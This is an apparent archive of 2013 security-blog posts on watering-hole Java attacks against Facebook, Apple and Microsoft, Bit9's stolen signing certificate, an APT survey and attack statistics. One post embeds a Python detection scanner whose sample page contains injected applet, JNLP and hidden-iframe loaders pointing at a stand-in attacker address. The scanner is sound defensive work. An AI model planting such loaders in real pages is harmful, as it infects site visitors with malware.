Archive
Microsoft Joins the Party of the Hacked Companies
With a scant statement on its Microsoft Security Response Center blog, the giant of Redmond has admitted to having been targeted by the same cyber attack that also hit Facebook and Apple.
“Consistent with our security response practices”, the company chose not to make a detailed statement during the initial information gathering process. According to the little information available, a small number of computers, including several machines in the Mac business unit, were infected with malicious software using techniques similar to those documented by other organizations.
This suggests that the company was probably a victim of the exploit injected through the compromise of the iPhoneDevSDK forum. Apparently there is no evidence of customer data being affected, although the investigation is still ongoing.
Only the latest example of an endless trail of high-profile security breaches.
1-15 February 2013 Cyber Attacks Statistics
It is time for the statistics related to the cyber attacks that occurred during the first half of February and were inserted into the corresponding timeline.
The Daily Trend of Attacks shows two major peaks: one on the 3rd of February (corresponding to the wave of DDoS attacks against Egyptian governmental targets carried out in the name of OpEgypt), and one at the end of the period, when the attacks carried out in the name of OpKashmir grew stronger. A third peak is visible on the 8th and, not by coincidence, it is again due to hacktivism, in particular to the so-called OpBankUnderAttack.
The Motivations Behind Attacks chart confirms the trend consolidated in January, with Hacktivism still at the top with exactly the same percentage (56%). Cyber Crime ranks second with half as many occurrences (28%). It is interesting to notice that Cyber Espionage has reached its highest value so far (9%), maybe a consequence of the hype surrounding APTs that is characterizing this period. For the first time I also had to insert a new motivation: Art. Frankly, I did not find any other way to explain the Democratization of the Offshore Business by the Italian artist Paolo Cirio.
SQL Injection keeps on leading the Distribution of Attack Techniques chart with 31% of occurrences, almost double DDoS in second place with 15.6%. It is particularly interesting to notice the presence of Targeted Attacks in third place, the highest rank ever reached so far. Media hype in the wake of the clamorous attacks of the last few days, or a real increase in the effectiveness of the technologies that detect a growing number of attacks belonging to this class of threats?
Last but not least, the Distribution of Targets chart confirms governmental targets in first place with nearly 30%, followed as usual by industries (18.8%) and organizations (12.5%). In any case the level of attention of crooks is also high against targets belonging to the Financial and News sectors, which steadily rank at number 4 and 5 of this unwelcome chart with 10.9% and 9.4% respectively. The others follow….
As usual, no need to remind you that the sample must be taken with great care, since it refers only to discovered attacks included in the 1-15 February 2013 Cyber Attacks Timeline (the so-called tip of the iceberg), and hence it does not pretend to be exhaustive but only aims to provide a high-level overview of the “cyber landscape”.
If you want to have an idea of how fragile our data are in cyberspace, have a look at the timelines of the main Cyber Attacks in 2011, 2012 and now 2013 (regularly updated). You may also want to have a look at the Cyber Attack Statistics, and follow @paulsparrows on Twitter for the latest updates.
Also, feel free to submit remarkable incidents that in your opinion deserve to be included in the timelines (and charts).
After Twitter and Facebook, Apple Reveals It Has Suffered the Same Cyber Attack
The same sophisticated cyber attack that targeted Facebook and Twitter has also targeted Apple, according to an exclusive revelation by Reuters. In this latest occurrence, the attackers were able to infect several Mac computers belonging to employees of Cupertino, exploiting the same 0-day Java vulnerability used to carry out the attacks against the two well-known social networks.
Further details have emerged in the meantime: particularly noticeable is the fact that the attackers used the now well-established “watering hole” technique, compromising a well-known mobile developer forum (iphonedevsdk.com) visited by the employees of Cupertino (and of many other high-profile companies). This has raised the concern that the attackers may have aimed to manipulate the code of smartphone apps in order to compromise a huge number of users. Currently the forum shows a banner inviting users to change their passwords.
Apple is working closely with the Federal Bureau of Investigation and has released an update to disable its Java SE 6. Although there is no clear evidence of a Chinese origin of the attack, unfortunately it comes out in the worst possible period: after the wave of attacks against U.S. media, Mandiant, the firm that investigated the attack against the NYT, released a detailed report suggesting a link between the hacks against U.S. assets and the Chinese Army.
1-16 February 2013 Cyber Attacks Timeline
Here is the summary of the Cyber Attacks Timeline for the first half of February. A period that will probably be remembered for the “sophisticated” cyber attacks against the two main social networks: Facebook and Twitter.
But the attacks against the two major social networks were not the only remarkable events of this period. Other high-profile governmental and industrial targets have fallen under the blows of (state-sponsored) cyber criminals: the list of governmental targets is led by the U.S. Department of Energy and the Japan Ministry of Foreign Affairs, while Bit9, a major security firm, was also targeted and leads the chart of industrial targets.
Hacktivists have raised the bar and breached the Federal Reserve, leaking the details of 4,000 U.S. bank executives. Similarly, the Bush family was also targeted, suffering a leak of private emails.
Even if the list is not as long as January’s, it includes other important targets, so scroll down to get an idea of how fragile our data are in cyberspace. Also have a look at the timelines of the main Cyber Attacks in 2011, 2012, 2013, and the related statistics (regularly updated), and follow @paulsparrows on Twitter for the latest updates.
Also, feel free to submit remarkable incidents that in your opinion deserve to be included in the timelines (and charts). To do so, you can use this form.
Facebook Admits to Having Been Hit By a Sophisticated Targeted Attack
A couple of weeks after similar revelations by Twitter, Facebook has joined the unwelcome list of social networks hit by targeted attacks.
This news has shaken this quiet February weekend, as Facebook officials told Ars Technica that in January they discovered several computers belonging to mobile application developers had been hacked using a zero-day Java attack. Following a well-established attack scheme, the exploit installed a collection of previously unseen malware.
The attack occurred within the same timeframe as the hack that hit Twitter and exposed the cryptographically hashed passwords of 250,000 users, and apparently targeted other companies that were completely unaware of the attack until they were notified by Facebook.
According to the information available, the attack showed several interesting (and nowadays common) patterns:
- The attackers used a “watering hole” attack, compromising the server of a popular mobile developer web forum and using it to spring the zero-day Java exploit on visitors. The exploit was injected into the site’s HTML, affecting any visitor who had Java enabled in the browser, regardless of the patch level of the machine.
- The exploit was used to download malware to victims’ computers, affecting both Windows and Apple machines.
- As usual, I would say, antivirus software was unable to detect the malware, nor was the malware slowed down by the fact that the machines were patched.
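The first pattern above, the loader injected into the forum's HTML, is the one a defender can actually look for in fetched pages. The following is an added example, not code from the original post nor from Facebook or the forum: a small scanner over a page's HTML that flags the tag types a Java-based watering hole relies on (applet, object/embed pointing at the Java plug-in, hidden off-site iframes, off-site scripts). The sample page, the host name forum.example and the attacker address 203.0.113.5 (a documentation address) are constructed for the example; the Java Plug-in ActiveX CLSID is the real one used by IE applet loaders.

```python
"""Flag the injected loaders a Java watering-hole attack plants in a page's HTML.
Added example; the sample page below is constructed, not the forum's real page."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# CLSID of the Java Plug-in ActiveX control used by <object> applet loaders in IE
JAVA_PLUGIN_CLSID = "clsid:8ad9c840-044e-11d1-b3e9-00805f499d93"
JAVA_MIME_PREFIXES = ("application/x-java-applet", "application/x-java-bean")


class WateringHoleScanner(HTMLParser):
    """Collect (kind, url) findings for tags that load Java or hidden off-site content."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_java_object = False

    def _offsite(self, url):
        # relative URLs have no host and are treated as on-site
        host = (urlparse(url).hostname or "").lower()
        return bool(host) and host != self.site_host and not host.endswith("." + self.site_host)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "applet":
            self.findings.append(("applet", a.get("archive") or a.get("code", "")))
        elif tag == "object":
            self._in_java_object = (
                a.get("classid", "").lower() == JAVA_PLUGIN_CLSID
                or a.get("type", "").lower().startswith(JAVA_MIME_PREFIXES)
            )
            if self._in_java_object:
                self.findings.append(("object-java", a.get("data") or a.get("codebase", "")))
        elif tag == "param" and self._in_java_object:
            # the JAR/JNLP an <object> loader fetches is usually given as a <param>
            if a.get("name", "").lower() in ("jnlp_href", "archive", "jar", "code"):
                self.findings[-1] = ("object-java", a.get("value", ""))
        elif tag == "embed" and a.get("type", "").lower().startswith(JAVA_MIME_PREFIXES):
            self.findings.append(("embed-java", a.get("src") or a.get("code", "")))
        elif tag == "iframe":
            # a 0x0 or display:none iframe pulling an off-site page is the classic injection
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width", "") in ("0", "1") or a.get("height", "") in ("0", "1")
            hidden = "display:none" in style or "visibility:hidden" in style
            if (tiny or hidden) and self._offsite(a.get("src", "")):
                self.findings.append(("hidden-iframe", a["src"]))
        elif tag == "script" and self._offsite(a.get("src", "")):
            self.findings.append(("offsite-script", a["src"]))

    def handle_endtag(self, tag):
        if tag == "object":
            self._in_java_object = False


def scan_html(html, site_host):
    """Return the list of (kind, url) findings for a page served by site_host."""
    scanner = WateringHoleScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a forum page with a legitimate same-site ad iframe plus
# three injected loaders pointing at the (documentation-range) attacker host.
SAMPLE_PAGE = """<html><body>
<h1>Forum</h1>
<script src="/js/forum.js"></script>
<iframe src="https://ads.forum.example/slot" width="300" height="250"></iframe>
<iframe src="http://203.0.113.5/x.html" width="0" height="0" style="display:none"></iframe>
<applet code="Loader.class" archive="http://203.0.113.5/l.jar" width="1" height="1"></applet>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="1" height="1">
  <param name="jnlp_href" value="http://203.0.113.5/a.jnlp">
</object>
</body></html>"""

if __name__ == "__main__":
    for kind, url in scan_html(SAMPLE_PAGE, "forum.example"):
        print(f"{kind:14} {url}")
```

Run against the sample, the scanner reports the hidden iframe, the applet JAR and the object's JNLP, all on 203.0.113.5, and stays silent on the same-site ad iframe and the local script. In practice the off-site-script finding needs a baseline of the hosts a site legitimately loads from, since CDNs are normal; the Java findings rarely do, because an applet loader on a forum page is almost never legitimate. Note also what the scanner cannot help with: once the exploit runs, OS patch level is irrelevant, which is why the practical mitigation at the time was disabling the browser Java plug-in rather than patching the machine.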
Facebook said it is working with the FBI to investigate the attack. This is only the latest example of a class of sophisticated targeted threats that are increasingly common and aggressive against high-profile targets, including tech industries, media and now social networks. As a matter of fact, (state-sponsored?) cyber criminals are actively exploiting 0-day vulnerabilities in Java (and Adobe Flash) in a 2013 that, in only two months, is proving dramatic for the infosec landscape.
Advanced Persistent Threats Are Among Us, Survey Reveals
They are among us! ISACA has just released its Advanced Persistent Threat Awareness Report. The study presents the results of a survey ISACA undertook in the fourth quarter of 2012 among information security professionals, including information security managers, in different industries and organizations throughout the world (1,551 individuals globally, representing more than 20 industries).
The results of the survey are interesting as a measure of the level of awareness, but not so encouraging (and in several cases contradictory) in other respects:
- 25.1% of respondents are very familiar with APTs, although (somewhat in contradiction with the previous statement) 53.4% of respondents indicated that they do not believe APTs differ from traditional threats.
- 89.7% of respondents believe that the use of social networking sites increases the likelihood of a successful APT attack.
- 87.3% think that BYOD, combined with rooting or jailbreaking, makes a successful APT attack more likely.
- The biggest risks for the enterprise are the loss of intellectual property (25.5%) and the loss of personal information (23.6%). Reputational damage is the third biggest risk (20.5%).
- Only 21.6% of respondents reported having been subject to an APT attack, but 63% believe that it is only a matter of time before their enterprise is targeted.
- In any case, nearly 60% of respondents believe that they are ready to respond to APT attacks. Of those, 14% responded that they are “very prepared”, meaning that they have a documented and tested plan in place for APTs. Another 49.6% responded that they have an incident management plan, although it does not specifically cover APTs.
But in my opinion the most surprising finding is that, from a technological point of view, a very high percentage (above 90%) of those surveyed responded that they are using antivirus and anti-malware and/or traditional network perimeter technologies to thwart APTs. Other kinds of technologies (sandboxing, event correlation, mobile or traditional endpoint control, remote access) have a much lower adoption (below 60%).
Contradictory results that show a high awareness of Advanced Persistent Threats, but perhaps more from a marketing point of view than from a substantial one. As a matter of fact, more than half of the sample does not consider APTs different from other threats, and this explains the high share of respondents who rely on traditional technologies to (believe they) thwart this class of threats.
January 2013 Cyber Attacks Statistics
Here are the statistics related to the cyber attacks included in the January 2013 Cyber Attacks Timelines. A terrible month that has seen an unprecedented number of cyber attacks.
The Daily Trend of Attacks emphasizes the peak in the second half of January; in particular the 24th saw a surprisingly high rate due to the massive (and, at least so far, last) wave of DDoS attacks against U.S. banks.
The Motivations Behind Attacks chart confirms the influence of hacktivism in this early 2013. More than half of the attacks (56%, to be precise) were motivated by this reason. From this point of view the new year begins in a completely different way from 2012 when, despite the peak of attacks in the wake of the Megaupload shutdown, Cyber Crime led the chart with 54% (against the 40% motivated by Hacktivism).
Easily predictable, the many attacks against U.S. banks have brought DDoS to the top of the Distribution of Attack Techniques chart with almost 40% of occurrences. SQLi follows closely with 33%. It is interesting to notice the relatively high share of Targeted Attacks (3.8%), mainly due to the sudden disclosure of (purported) Chinese cyber attacks against U.S. media.
Again, the attacks against U.S. banks push financial targets to the top of the Distribution of Targets chart, ten points ahead of governmental targets which, at least this time, rank second with 21% of occurrences. Targets belonging to industry rank third with 13%.
Even in this promising 2013, no need to remind you that the sample must be taken with great care, since it refers only to discovered attacks included in the January 2013 Cyber Attacks Timeline (the so-called tip of the iceberg), and hence it does not pretend to be exhaustive but only aims to provide a high-level overview of the “cyber landscape”.
Certificates From Leading Security Vendor Bit9 Used to Sign Malware
Another high-profile security company has been breached. Bit9, a leading provider of application whitelisting technology, has admitted to having been attacked by a malicious external third party who was able to illegally gain access to one of its digital code-signing certificates. The attackers did not waste time: the compromised certificate was immediately used to sign malware that infiltrated, according to the company’s investigation, the networks of three customers.
The news was initially revealed by Brian Krebs in a blog post, and later confirmed by the security vendor, which also gave additional (scant) details, including the fact that the attackers were able to infiltrate a portion of its internal network that was not protected by its own product.
“We simply did not follow the best practices we recommend to our customers by making certain our product was on all physical and virtual machines within Bit9.”
At first glance the attack has many points in common with the infamous RSA breach of 2011, including the fact that the real target was perhaps not the company itself but the protected networks of its customers. On the other hand, if it is true, as the company claims, that Bit9 was the only security company capable of stopping both the Flame malware and the RSA breach attack, then to reach their target the attackers had no other option than to attack the source of that technology: a whitelisting product trusts what the vendor’s certificate signs, so a binary signed with the stolen certificate walks straight through it.
The latest demonstration, if one were needed, that attacks are becoming more and more aggressive and sophisticated, and that protection is not only a matter of technology but also of good procedures and best practice, and not only for the potential victims…
I am Terribly Late!
WTF! This month I am terribly late with the Cyber Attack Timeline. I can anticipate that, as you will probably have guessed, this month has seen an unprecedented rate of attacks.
I have already compiled the timeline for January; I still need a little time to check it and to write the usual comments. I still do not know whether I will be able to publish it today or tomorrow (I am quite busy this afternoon), but it will be here by 12:00 CET tomorrow at the latest.
Thanks for your patience, and please continue to support my work with your visits!